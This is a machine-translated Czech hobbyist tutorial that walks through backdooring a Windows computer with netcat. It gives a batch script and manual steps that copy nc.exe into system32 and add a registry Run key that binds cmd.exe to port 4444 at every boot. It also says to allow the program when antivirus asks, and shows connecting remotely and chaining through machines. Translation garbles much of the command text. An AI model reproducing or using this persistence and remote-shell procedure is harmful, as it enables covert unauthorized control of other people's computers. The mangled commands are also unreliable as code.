Netcat Fun!: 5 kroků

2024 Autor: John Day | [email protected]. Naposledy změněno: 2024-01-30 08:24

Tento návod vám ukáže, jak vytvořit zadní vrátka na počítači pomocí netcatu! Ukážu vám dva způsoby, jak toho dosáhnout, s dávkovým souborem i bez něj, který to za vás automatizuje. Tento instruktáž již předpokládá, že jste v počítači již získali oprávnění root, pravděpodobně s 0phcrack LiveCD zde. Nyní k pokynu.

Krok 1: Stáhněte si Netcat

Ušetřil jsem vám potíže se 3 minutami hledání na Googlu a dal jsem nc.exe na instructables, které si můžete stáhnout. Volitelně si také můžete stáhnout nc.bat, což je dávkový soubor, který jsem vytvořil za účelem automatizace procesu za vás. Ujistěte se, že pokud si stáhnete soubor nc.bat, bude to 464 bajtů, protože jsem stále nahrával verze a zjišťoval, že s tím není něco v pořádku. Pokud to není 464 bajtů, program nebude odpovídat tomuto pokynu.

Krok 2: S Nc.bat

Aby soubory nc.bat fungovaly správně, musí být nejprve ve stejném adresáři. Pro tuto operaci doporučuji použít flash disk nebo CD-ROM. K tomu jsem použil 512 MB geek squad flash disk, ale to jsem jen já. Zkopírujte tedy soubory na externí zařízení médií a přeneste je do počítače, na kterém máte root. Přejděte na mediální zařízení a dvakrát klikněte na nc.bat. To zkopíruje soubor nc.exe do složky system32 v kořenovém adresáři systému (obvykle C: / Windows nebo C: / WINNT) a provede nezbytné změny v registru. Poté si zapište IP adresu. Bude to něco jako '192.168.1.103', což je moje. Jakmile to bude hotové, restartujte počítač a přihlaste se. Poté se vás antivirový program může zeptat, zda chcete program povolit/zakázat. Klikněte na „Povolit“nebo podobně. Mějte na paměti, že v tomto pokynu můžete telnetovat pouze z místní sítě daného počítače. Poté odejděte nebo se odhlaste nebo cokoli jiného chcete.

Krok 3: Bez Nc.bat

Chcete -li to provést, musíte mít nc.exe na disku CD nebo Flash. Přejděte k počítači, přihlaste se a připojte jednotku flash nebo vložte disk CD. Odtud existují dva způsoby: Vyleštěná grafická uživatelská rozhraní oken nebo špinavý, staromódní způsob příkazového řádku. Špinavý, staromódní způsob příkazového řádku: Vytáhněte příkazový řádek tak, že přejdete na StartRun a zadejte:

cmd.exePřejděte na flash nebo CD mechaniku. Pokud nevíte, který disk je který, klikněte pravým tlačítkem na tlačítko Start a klikněte na Prozkoumat. Klikněte na všechny jiné než místní jednotky v tomto počítači, dokud se nedostanete k jednotce flash/CD. Zapamatujte si písmeno jednotky a vraťte se zpět do příkazového řádku. Zadejte písmeno jednotky následované dvojtečkou, například: K: Poté zadejte vždy jeden řádek a poté stiskněte klávesu Enter

zkopírovat nc.exe%systemroot%\ system32 / nc.exereg přidat HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 - t -e cmd.exe "To byla skoro instalace. Vše, co nyní potřebujete vědět, je místní IP adresa, kterou snadno zjistíte zadáním příkazu 'ipconfig' a vyhledáním něčeho v tabulce jako "192.168.1.103". Poté restartujte počítač a přihlaste se zpět. Antivirový program se vás může zeptat, zda chcete povolit/zakázat. Klikněte na Povolit. Potom si můžete s počítačem dělat, co chcete. Vyladěná grafická rozhraní Windows Klikněte pravým tlačítkem na tlačítko Start a klikněte na Prozkoumat. Klikněte na všechny jiné než místní jednotky v tomto počítači, dokud se nedostanete k jednotce flash/CD. Poté klikněte pravým tlačítkem na nc.exe a zkopírujte. Poté přejděte na jednotku C a klikněte na složku Windows nebo WINNT. Poté přejděte do složky system32 a vložte nc.exe. Zavřete to a přejděte na StartRun. Zadejte regedit. Procházejte složkami: HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows / CurrentVersion / Run Poté klikněte pravým tlačítkem na prázdné místo a přejděte na hodnotu NewString. Zadejte název, který chcete, ale pro hodnotu zadejte

%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exeTo byla skoro instalace. Vše, co nyní potřebujete vědět, je místní IP adresa, kterou snadno zjistíte zadáním příkazu 'ipconfig' do příkazového řádku (StartRun: cmd.exe) a hledáním něčeho v tabulce jako „192.168.1.103“. Potom restartujte počítač a přihlaste se zpět. Antivirový program se vás může zeptat, zda chcete povolit/zakázat. Klikněte na Povolit. Pak si můžete s počítačem dělat, co chcete.

Krok 4: Návrat zpět

Jakmile jej máte nainstalovaný a chcete převzít kontrolu nad hostitelem, otevřete příkazový řádek nebo PuTTY. Myslím, že PuTTY je úžasný, a proto vám jej dovolím stáhnout zde. Pomocí PuTTY Stáhněte si a otevřete PuTTY.exe. Klikněte na protokol „raw“. Do textového pole port # zadejte 4444. Do pole „adresa hostitele“zadejte adresu IP, kterou jste si zapsali během instalace. Poté stiskněte Enter. PuTTY by se měl připojit k poli a dostanete příkazový řádek. Použití příkazového řádku Otevřete příkazový řádek a zadejte „telnet 4444“. Poté stiskněte klávesu Enter a měli byste získat příkazový řádek. To vám umožní vzdáleně provádět na počítači téměř cokoli, co můžete dělat s místním účtem. Začne to být zajímavé, když přejdete na jeden počítač a poté z jiného počítače přejdete na jiný počítač, abyste spojili celý řetězec počítačů. Bavte se (právně)!

Krok 5: Zdrojový kód

Protože jsem byl požádán, vložím zdrojový kód (pro dávkový soubor) a vysvětlím každý příkaz a co dělá. Dávejte si pozor! Toto je aktuální verze programu dávkové instalace. Pokud je váš jiný, kód se bude lišit.

@echo offcopy nc.exe%systemroot%\ system32 / nc.exeif úroveň chyb 0 přejít na chybu regeditgoto: regeditreg přidat HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc. exe -L -d -p 4444 -t -e cmd.exe "pokud úroveň chyb 0 přejít na ip: errorecho došlo k něčemu neočekávanému a program potřebuje ukončit. přejít na konec: ipecho zapsat IP adresu z tableipconfig: endecho end.efekto páska ven. pauza@echo off-Sděluje, aby se při provádění nezobrazovaly příkazy. copy nc.exe %systemroot %\ system32 / nc.exe-obvykle kopíruje netcat do C: / WINDOWS / system32. Díky tomu, když se vrátíte dovnitř, místo neustálé změny adresářů stačí zadat „nc“a otevřít další port. Pokud úroveň chyb 0 přejít na kontrolu chyb regedit. Pokud byla kopie úspěšná, pokračuje se v úpravě registru. Goto chyba-Pokud došlo k chybě, přejděte na: error label.:regedit-A štítek s uvedením, že když program říká „goto regedit“, přejděte sem.reg přidat HKLM / SOFTWARE / Microsoft / Windows / CurrentVersion / Run /f /v nc /d "%systemroot%\ system32 / nc.exe -L -d -p 4444 -t -e cmd.exe" -(předpokládá být jeden řádek), který přidá klíč registru k restartování programu při restartu. /f znamená přepsání stávajícího klíče, /v pro název klíče, /d pro data. Zbytek tagů je zadán pro netcat. -L říká, že ho při ukončení restartujete, takže nemusíte čekat, až se počítač restartuje. -zapomněl jsem. -p 4444 určuje port #. -t zapomněl jsem. -e cmd.exe spustí příkazový řádek na vzdáleném připojení. pokud úroveň chyb 0 přejít na kontrolu chyb IP. Pokud se běh pokazil, přeskočí tento řádek a přejde dolů na: error label.echo došlo k něčemu neočekávanému a program potřebuje ukončit.-řekne programu, aby vytiskl „došlo k něčemu neočekávanému a program potřebuje ukončit "na obrazovce. přejít na konec-pokud to přešlo na chybovou zprávu, něco se pokazilo a program je třeba stejně ukončit.:ip-Again, label.echo zapsat IP adresu z tabulky-Zapíše" IP adresa z tabulky "na obrazovku.ipconfig-Toto je příkaz, který vytiskne informace o nastavení vaší místní sítě (LAN).: end-Label.echo end.-zapíše" end "na pásku potrubí screen.echo. -zapíše na obrazovku „lepicí pásku“. pauza-tento příkaz pozastaví program a čeká, až uživatel stiskne klávesu. V tomto programu čeká na vstup a poté program ukončí.